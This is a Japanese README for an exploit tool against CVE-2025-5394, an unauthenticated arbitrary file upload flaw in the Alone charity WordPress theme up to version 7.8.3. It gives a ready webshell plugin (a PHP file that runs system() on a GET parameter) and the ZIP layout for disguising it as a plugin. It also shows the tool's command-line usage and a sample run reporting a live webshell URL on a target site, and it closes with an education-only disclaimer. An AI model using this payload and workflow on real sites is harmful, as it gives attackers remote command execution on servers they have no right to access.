
Alone – チャリティマルチパーパス非営利WordPressテーマ <= 7.8.3 - 認可の欠如による未認証の任意のファイルアップロード(プラグインインストールを介して)
Alone – チャリティ多目的非営利WordPressテーマ
バージョン: <= 7.8.3
CVE: CVE-2025-5394
CVSSスコア: 9.8 (重要)
WordPress用Aloneテーマは、alone_import_pack_install_plugin()関数における機能チェックの欠如により、任意のファイルアップロードに対して脆弱です。この欠陥により、未認証の攻撃者がリモートロケーションからZIPファイル(プラグインを装ったもの)をアップロードし、リモートコード実行が可能になる可能性があります。
このリポジトリには、CVE-2025-5394のエクスプロイトを自動化するPythonスクリプトが含まれています。このスクリプトは脆弱なAJAXアクションをトリガーし、偽のプラグイン(ウェブシェルを含む)をWordPressサーバーに直接アップロードします。
アップロードするZIPファイルは次の構造に従う必要があります:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
ここで:
shell_plugin はプラグインディレクトリです。shell_plugin.php はプラグインヘッダーを含む有効なPHPプラグインファイルです。shell_plugin.php 内の最小限のプラグインヘッダーの例:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
このスクリプトは教育および研究目的のみで提供されます。作者は、このコードを使用して行われた不適切使用または違法行為について一切の責任を負いません。自分が所有するシステム、またはテストの明示的な許可があるシステムでのみ使用してください。
Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited